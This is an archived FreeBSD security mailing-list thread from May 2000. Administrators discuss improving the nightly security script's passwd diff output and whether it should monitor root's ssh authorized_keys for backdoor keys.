3c3 > >> > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > >> > --- > >> > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > >> > [snip] > > Actually, the use of "password" could mask a change... consider > > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > --- > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/tcsh > > The admin would likely assume only the shell has changed even > though password may have changed. Now _there_ is a good point. We need password1/password2 for security. Damn. Greetz, Peter. -- Powered by WUT? - Peter van Dijk [student:sysadmin:developer:madly in love] | `Yes, this was actually a hack and not | (petervd@|www.)vuurwerk.nl | a scritp kiddie clicking a mouse button.' | www.dataloss.net | - hackernews.com, commenting on the apache.org deface To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 6:32:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercure.univ-ubs.fr (mercure.univ-ubs.fr [194.199.58.4]) by hub.freebsd.org (Postfix) with ESMTP id 2B05437B7AC for ; Wed, 10 May 2000 06:32:34 -0700 (PDT) (envelope-from beurton@moorea.univ-ubs.fr) Received: from moorea.univ-ubs.fr (beurton@moorea.univ-ubs.fr [193.52.49.20]) by mercure.univ-ubs.fr (8.9.1a/jtpda-5.3.1) with ESMTP id PAA19860 for ; Wed, 10 May 2000 15:32:12 +0200 Received: (from beurton@localhost) by moorea.univ-ubs.fr (8.9.3/8.9.3/$RCSfile: nisdebian-client.mc,v $Revision: 1.2 $) id PAA24088 for security@FreeBSD.ORG; Wed, 10 May 2000 15:32:00 +0200 Date: Wed, 10 May 2000 15:32:00 +0200 From: "Luc.Beurton" To: security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000510153159.A23888@moorea.univ-ubs.fr> References: <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000509150609.L42267@vuurwerk.nl> <20000509215515.B29766@cc942873-a.ewndsr1.nj.home.com> <20000510140053.G46065@vuurwerk.nl> <3.0.5.32.20000510055246.009b9100@infidel.boolean.net> <20000510145508.M46065@vuurwerk.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: <20000510145508.M46065@vuurwerk.nl>; from Peter van Dijk on Wed, May 10, 2000 at 02:55:08PM +0200 X-Whois: LB895-ARIN Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Actually, the use of "password" could mask a change... consider > > > > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > > --- > > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/tcsh > > > > The admin would likely assume only the shell has changed even > > though password may have changed. > > Now _there_ is a good point. We need password1/password2 for security. > Damn. Maybe, the solution could be to crypt the crypted password like this ? awk 'BEGIN{FS=":";OFS=":"}($2){CMD="echo \""$2"\"| /sbin/md5";CMD|getline $2;close(CMD)}{print}' Or add flag -d -f to md5, something like : diff /var/backup/master.passwd.bak /etc/master.passwd | md5 -d: -f2 I don't know if md5 is secure enough with a small string . Luc Beurton. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 11:32:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sullivan-reportlibrary.com (chrtn1UBR2-3-hfc-0252-d8d8b012.rdc1.tn.comcastatwork.com [216.216.176.18]) by hub.freebsd.org (Postfix) with ESMTP id 645FA37B87C for ; Wed, 10 May 2000 11:32:29 -0700 (PDT) (envelope-from marketing@infotechsys.net) Received: from infotechsys.net (2K-SERVER [192.168.0.100]) by mail.sullivan-reportlibrary.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id KTQY5PJ5; Wed, 10 May 2000 14:29:16 -0400 MIME-Version: 1.0 From: marketing@infotechsys.net Reply-To: marketing@infotechsys.net To: security@freebsd.org Subject: ITS Brochure Mime-Version: 1.0 Content-Type: text/html; charset="us-ascii" Message-Id: <20000510183229.645FA37B87C@hub.freebsd.org> Date: Wed, 10 May 2000 11:32:29 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ITS Internet Site

P.O. Box 70671

Charleston, SC 29415-0671

843.566.1397


To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 11:56:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-051.resnet.wisc.edu [146.151.42.51]) by hub.freebsd.org (Postfix) with SMTP id C016237B8FE for ; Wed, 10 May 2000 11:56:39 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 26888 invoked by uid 1000); 10 May 2000 18:56:29 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 10 May 2000 18:56:29 -0000 Date: Wed, 10 May 2000 13:56:29 -0500 (CDT) From: Mike Silbersack To: Peter van Dijk Cc: security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: <20000509150609.L42267@vuurwerk.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 9 May 2000, Peter van Dijk wrote: > [snip] > > Backup passwd and group files: > envy.vuurwerk.nl passwd diffs: > 3c3 > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > --- > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > [snip] > > This line needed some thinking from me until I realized that it was trying > to tell me the rootpassword changed (which I already knew, ofcourse). Could > this be made more obvious, something like (password1) in the top one and > (password2) in the bottom one? This just got me thinking... are .ssh/authorized_keys files checked for changes by the security scripts? I know I probably wouldn't notice for a long while if someone had modified mine, all the time during which someone could be playing around on the box. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 12:21:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 16D1F37B8EA for ; Wed, 10 May 2000 12:21:33 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by pawn.primelocation.net (Postfix, from userid 1016) id 7D3BF9B1D; Wed, 10 May 2000 15:21:30 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by pawn.primelocation.net (Postfix) with ESMTP id 70E5EBA0F; Wed, 10 May 2000 15:21:30 -0400 (EDT) Date: Wed, 10 May 2000 15:21:30 -0400 (EDT) From: "Chris D. Faulhaber" X-Sender: cdf.lists@pawn.primelocation.net To: Mike Silbersack Cc: Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 10 May 2000, Mike Silbersack wrote: > > On Tue, 9 May 2000, Peter van Dijk wrote: > > > [snip] > > > > Backup passwd and group files: > > envy.vuurwerk.nl passwd diffs: > > 3c3 > > < root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > > --- > > > root:(password):0:0::0:0:Charlie &:/root:/usr/local/bin/bash > > [snip] > > > > This line needed some thinking from me until I realized that it was trying > > to tell me the rootpassword changed (which I already knew, ofcourse). Could > > this be made more obvious, something like (password1) in the top one and > > (password2) in the bottom one? > > This just got me thinking... are .ssh/authorized_keys files checked for > changes by the security scripts? I know I probably wouldn't notice for a > long while if someone had modified mine, all the time during which someone > could be playing around on the box. > I don't think it is the system's responsibility to check user's files; however, it might be a decent idea to have the system check to see anything in /etc/ssh/ has changed. See http://www.fxp.org/~jedgar/230.backup-ssh for the script I use. ----- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 14:42:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-051.resnet.wisc.edu [146.151.42.51]) by hub.freebsd.org (Postfix) with SMTP id C0B0A37B837 for ; Wed, 10 May 2000 14:42:56 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 28580 invoked by uid 1000); 10 May 2000 21:42:54 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 10 May 2000 21:42:54 -0000 Date: Wed, 10 May 2000 16:42:54 -0500 (CDT) From: Mike Silbersack To: "Chris D. Faulhaber" Cc: Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 10 May 2000, Chris D. Faulhaber wrote: > On Wed, 10 May 2000, Mike Silbersack wrote: > > > This just got me thinking... are .ssh/authorized_keys files checked for > > changes by the security scripts? I know I probably wouldn't notice for a > > long while if someone had modified mine, all the time during which someone > > could be playing around on the box. > > > > I don't think it is the system's responsibility to check user's files; > however, it might be a decent idea to have the system check to see > anything in /etc/ssh/ has changed. See > http://www.fxp.org/~jedgar/230.backup-ssh for the script I use. See, I'm not sure that authorized_keys are user files, as they perform the same function that system passwords do. And since ssh is now part of the base system, they should be considered equal in importance to the password file. I understand that diffing every user's authorized_keys would be a huge pain, perhaps only root/toor need to be checked. In the long term, perhaps having a central database of all the public keys on the system instead of authorized_keys is the correct answer. In the meantime, I think some thought should be put to the issue of watching root's authorized_keys - if someone kind find a way to cause some root running daemon (say, mysql) to create an arbitrary authorized_keys, you'd never see it happen in the security logs. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 14:55: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id 210C337B996 for ; Wed, 10 May 2000 14:54:53 -0700 (PDT) (envelope-from petervd@vuurwerk.nl) Received: (qmail 19647 invoked from network); 10 May 2000 21:54:49 -0000 Received: from kesteren.vuurwerk.nl (HELO vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 10 May 2000 21:54:49 -0000 Received: (qmail 55365 invoked by uid 11109); 10 May 2000 21:54:49 -0000 Mail-Followup-To: security@freebsd.org Date: Wed, 10 May 2000 23:54:49 +0200 From: Peter van Dijk To: security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000510235449.D50484@vuurwerk.nl> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from silby@silby.com on Wed, May 10, 2000 at 04:42:54PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 10, 2000 at 04:42:54PM -0500, Mike Silbersack wrote: [snip] > > In the long term, perhaps having a central database of all the public keys > on the system instead of authorized_keys is the correct answer. In the > meantime, I think some thought should be put to the issue of watching > root's authorized_keys - if someone kind find a way to cause some root > running daemon (say, mysql) to create an arbitrary authorized_keys, you'd > never see it happen in the security logs. Have a look at http://www.dataloss.net/papers/how.defaced.apache.org.txt to see how real the threat of a root-mysql is ;) Greetz, Peter. -- Powered by WUT? - Peter van Dijk [student:sysadmin:developer:madly in love] | `Yes, this was actually a hack and not | (petervd@|www.)vuurwerk.nl | a scritp kiddie clicking a mouse button.' | www.dataloss.net | - hackernews.com, commenting on the apache.org deface To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 15:17:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from postal.linkfast.net (postal.linkfast.net [208.160.105.2]) by hub.freebsd.org (Postfix) with ESMTP id B189D37B6DA for ; Wed, 10 May 2000 15:17:48 -0700 (PDT) (envelope-from fullermd@linkfast.net) Received: by postal.linkfast.net (Postfix, from userid 100) id 436929B1A; Wed, 10 May 2000 17:17:46 -0500 (CDT) Date: Wed, 10 May 2000 17:17:46 -0500 From: Matthew Fuller To: Mike Silbersack Cc: "Chris D. Faulhaber" , Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000510171745.E61969@linkfast.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from silby@silby.com on Wed, May 10, 2000 at 04:42:54PM -0500 X-OS: FreeBSD Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 10, 2000 at 04:42:54PM -0500, a little birdie told me that Mike Silbersack remarked > > See, I'm not sure that authorized_keys are user files, as they perform the > same function that system passwords do. And since ssh is now part of the > base system, they should be considered equal in importance to the password > file. Well, consider that authorized_keys files perform the same function as .rhosts. Would you propose doing the same for them? -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Unix Systems Administrator | fullermd@linkfast.net Specializing in FreeBSD | http://www.over-yonder.net/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 16:24:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (adam042-051.resnet.wisc.edu [146.151.42.51]) by hub.freebsd.org (Postfix) with SMTP id 32C1837BA52 for ; Wed, 10 May 2000 16:24:37 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 28817 invoked by uid 1000); 10 May 2000 23:24:35 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 10 May 2000 23:24:35 -0000 Date: Wed, 10 May 2000 18:24:35 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: <20000510171745.E61969@linkfast.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 10 May 2000, Matthew Fuller wrote: > On Wed, May 10, 2000 at 04:42:54PM -0500, a little birdie told me > that Mike Silbersack remarked > > > > See, I'm not sure that authorized_keys are user files, as they perform the > > same function that system passwords do. And since ssh is now part of the > > base system, they should be considered equal in importance to the password > > file. > > Well, consider that authorized_keys files perform the same function as > .rhosts. Would you propose doing the same for them? I don't use telnet/rshd/etc, so I don't care about them. But in a paranoid system, I suppose they would be tracked. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 22:58:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from jason.argos.org (a1-3b058.neo.rr.com [24.93.181.58]) by hub.freebsd.org (Postfix) with ESMTP id DB55F37B788 for ; Wed, 10 May 2000 22:58:10 -0700 (PDT) (envelope-from mike@argos.org) Received: from localhost (mike@localhost) by jason.argos.org (8.9.1/8.9.1) with ESMTP id BAA00212; Thu, 11 May 2000 01:57:08 -0400 Date: Thu, 11 May 2000 01:57:08 -0400 (EDT) From: Mike Nowlin To: Mike Silbersack Cc: "Chris D. Faulhaber" , Peter van Dijk , security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I understand that diffing every user's authorized_keys would be a huge > pain, perhaps only root/toor need to be checked. Or everyone in group 0 -- the people in that group should understand the relevance of changes in these files, and why ask for problems? (Not saying this is a good idea, (although it might be), but if you're gonna do it, do it right.) mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 10 23:24: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from axl.ops.uunet.co.za (axl.ops.uunet.co.za [196.31.2.163]) by hub.freebsd.org (Postfix) with ESMTP id 033F237B7E4 for ; Wed, 10 May 2000 23:23:53 -0700 (PDT) (envelope-from sheldonh@axl.ops.uunet.co.za) Received: from sheldonh (helo=axl.ops.uunet.co.za) by axl.ops.uunet.co.za with local-esmtp (Exim 3.13 #1) id 12pmLz-0009wd-00; Thu, 11 May 2000 08:21:47 +0200 From: Sheldon Hearn To: Mike Nowlin Cc: Mike Silbersack , "Chris D. Faulhaber" , Peter van Dijk , security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Thu, 11 May 2000 01:57:08 -0400." Date: Thu, 11 May 2000 08:21:47 +0200 Message-ID: <38229.958026107@axl.ops.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000 01:57:08 -0400, Mike Nowlin wrote: > > I understand that diffing every user's authorized_keys would be a huge > > pain, perhaps only root/toor need to be checked. > > Or everyone in group 0 -- the people in that group should understand the > relevance of changes in these files, and why ask for problems? I don't think these ideas are useful for the generalized daily run. They should remain local hacks (ideally with well-circulated patches) until someone's done the work to make the daily security run configurable, and even that needs patch circulation before further discussion. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 3:25: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id D95B437B90D for ; Thu, 11 May 2000 03:24:52 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([192.168.192.2]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id KAA09707; Thu, 11 May 2000 10:23:59 GMT Message-ID: <391A8A3C.795C15F7@algroup.co.uk> Date: Thu, 11 May 2000 11:23:56 +0100 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Mike Silbersack Cc: "Chris D. Faulhaber" , Peter van Dijk , security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike Silbersack wrote: > > On Wed, 10 May 2000, Chris D. Faulhaber wrote: > > > On Wed, 10 May 2000, Mike Silbersack wrote: > > > > > This just got me thinking... are .ssh/authorized_keys files checked for > > > changes by the security scripts? I know I probably wouldn't notice for a > > > long while if someone had modified mine, all the time during which someone > > > could be playing around on the box. > > > > > > > I don't think it is the system's responsibility to check user's files; > > however, it might be a decent idea to have the system check to see > > anything in /etc/ssh/ has changed. See > > http://www.fxp.org/~jedgar/230.backup-ssh for the script I use. > > See, I'm not sure that authorized_keys are user files, as they perform the > same function that system passwords do. And since ssh is now part of the > base system, they should be considered equal in importance to the password > file. Absolutely. If someone backdoors your system with an authorized key, and is confident they can gain root from a luser account, they don't need to go any further, and it's extremely likely that the change will go unnoticed *forever* (when was the last time you checked your own authorized_keys file?)... As it happens, I'm working on a patch for /etc/security at the moment - I'll post it for review... cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9: 4:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 4521537BB10 for ; Thu, 11 May 2000 09:03:49 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Thu, 11 May 2000 10:03:48 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma014294; Thu, 11 May 00 10:03:38 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA08418; Thu, 11 May 2000 10:03:38 -0600 (MDT) Date: Thu, 11 May 2000 10:03:38 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Adam Laurie Cc: freebsd-security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: <391A8A3C.795C15F7@algroup.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Adam Laurie wrote: > If someone backdoors your system with an authorized key, and is > confident they can gain root from a luser account, they don't need to > go any further, and it's extremely likely that the change will go > unnoticed *forever* But if you have hostile local users with root access, can you even trust the output from /etc/security? I see the output from /etc/security as (somewhat) interesting statistical data, but in my opinion it should never be used for intrusion detection or be used as a serious security tool. If I can root your box, what's to stop me from falsifying the reference data in /var used by /etc/security to detect system changes? If nothing else, calling it a "security" script gives a false sense of just that. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:11:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1C2D737B612 for ; Thu, 11 May 2000 09:11:49 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id MAA17380; Thu, 11 May 2000 12:11:40 -0400 (EDT) (envelope-from wollman) Date: Thu, 11 May 2000 12:11:40 -0400 (EDT) From: Garrett Wollman Message-Id: <200005111611.MAA17380@khavrinen.lcs.mit.edu> To: Paul Hart Cc: freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: References: <391A8A3C.795C15F7@algroup.co.uk> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > If I can root your box, what's to stop me from falsifying the > reference data in /var used by /etc/security to detect system > changes? Stupidity and inexperience. Also, not all break-ins result in root compromise. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:20:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from axl.ops.uunet.co.za (axl.ops.uunet.co.za [196.31.2.163]) by hub.freebsd.org (Postfix) with ESMTP id B992637B612 for ; Thu, 11 May 2000 09:20:32 -0700 (PDT) (envelope-from sheldonh@axl.ops.uunet.co.za) Received: from sheldonh (helo=axl.ops.uunet.co.za) by axl.ops.uunet.co.za with local-esmtp (Exim 3.13 #1) id 12pvh7-000DNJ-00; Thu, 11 May 2000 18:20:13 +0200 From: Sheldon Hearn To: Paul Hart Cc: Adam Laurie , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Thu, 11 May 2000 10:03:38 CST." Date: Thu, 11 May 2000 18:20:13 +0200 Message-ID: <51416.958062013@axl.ops.uunet.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000 10:03:38 CST, Paul Hart wrote: > But if you have hostile local users with root access, can you even trust > the output from /etc/security? The nightly security run is there to assist the benevolant administrator by highlighting things that the administrator himself (usually) has changed that may influence the security of the system. It is in no way suited to assisting in the tracking down of rooted machines. So can we let this die already? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:21:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 70EA537BAA9 for ; Thu, 11 May 2000 09:21:38 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Thu, 11 May 2000 10:21:37 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma018905; Thu, 11 May 00 10:21:23 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA08476; Thu, 11 May 2000 10:21:22 -0600 (MDT) Date: Thu, 11 May 2000 10:21:22 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Garrett Wollman Cc: freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: <200005111611.MAA17380@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Garrett Wollman wrote: > Stupidity and inexperience. That's a scary thought. "Our security depends on all attackers being stupid." Shouldn't we work toward meaningful tools that cannot be subverted even by the most skilled of attackers? Not all attackers are script kiddies and it would be foolish of us to think they are. > Also, not all break-ins result in root compromise. Agreed. But this specific example did involve root compromise. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:23:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 347A737B754 for ; Thu, 11 May 2000 09:23:29 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e4BGtD405475; Thu, 11 May 2000 09:55:13 -0700 (PDT) Date: Thu, 11 May 2000 09:55:13 -0700 From: Alfred Perlstein To: Garrett Wollman Cc: Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output Message-ID: <20000511095512.D4889@fw.wintelcom.net> References: <391A8A3C.795C15F7@algroup.co.uk> <200005111611.MAA17380@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <200005111611.MAA17380@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Thu, May 11, 2000 at 12:11:40PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Garrett Wollman [000511 09:46] wrote: > < said: > > > If I can root your box, what's to stop me from falsifying the > > reference data in /var used by /etc/security to detect system > > changes? > > Stupidity and inexperience. That and chflags. :) > Also, not all break-ins result in root compromise. Most I've seen lately result in pretty hysterical /root/.bash_history files. :) -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:24:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id CC3B537B582 for ; Thu, 11 May 2000 09:24:30 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([192.168.192.2]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id QAA10342; Thu, 11 May 2000 16:23:29 GMT Message-ID: <391ADE81.77F6FF3A@algroup.co.uk> Date: Thu, 11 May 2000 17:23:29 +0100 From: Adam Laurie X-Mailer: Mozilla 4.7 [en-gb] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Garrett Wollman Cc: Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output References: <391A8A3C.795C15F7@algroup.co.uk> <200005111611.MAA17380@khavrinen.lcs.mit.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Garrett Wollman wrote: > > < said: > > > If I can root your box, what's to stop me from falsifying the > > reference data in /var used by /etc/security to detect system > > changes? > > Stupidity and inexperience. Also, not all break-ins result in root > compromise. Indeed. If your box has been rooted, you're very likely stuffed. However, it will also trap things like one luser giving their mates access, or breaching company policy by adding their homegrown key etc. etc. Currently, unless you went looking, you would not even know that they had ssh access, and, as far as I'm concerned, daily/weekly/monthly etc. are just tools that regularly go looking for oddities for me, so the more they tell me the happier I am. For serious security checking, you obviously cannot rely on such scripts. Incidentally, I'm basing my patch on the openbsd scripts which do a much more thorough job already... cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB 